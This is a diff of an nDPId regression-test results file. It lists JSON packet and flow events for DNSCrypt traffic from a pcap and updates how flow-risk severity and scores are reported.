 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXcpAAL0RQhYKAAABjgTNL5zKAbsCCB4KqloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXckAub0RgyoKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":352,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcsgAL0RXlUKAAABjgTNL8rfAbsGBBssqlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcsAub0RgygKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":354,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXcwgAL0RXlQKAAABjgTNL9NQAbsGBBK3qlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4lAADQRFDCXUN5PCgAAAQG7y0gAw+xKXDCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAABQXcwAub0RgycKAAABjgTNLwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":357,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXc1AAL0RQhMKAAABjgTNL4w\/AbsCCB4KqlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318061,"pkt":"ZmZmZmZmRERERERECABFAADX+4pAADQRFC+XUN5PCgAAAQG74SQAw9ZtXDGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":946739318062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318062,"pkt":"ZmZmZmZmRERERERECABFAADX+4tAADQRFC6XUN5PCgAAAQG7lm8AwyEmXC6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":946739318063,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318063,"pkt":"ZmZmZmZmRERERERECABFAADX+4hAADQRFDGXUN5PCgAAAQG7unEAw\/0kXC2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
@@ -746,28 +746,28 @@
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":946739318168,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739318168,"pkt":"ZmZmZmZmRERERERECABFAADWEfAAADQRWDeOBM0vCgAAAQG7xNMAwo9hqlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
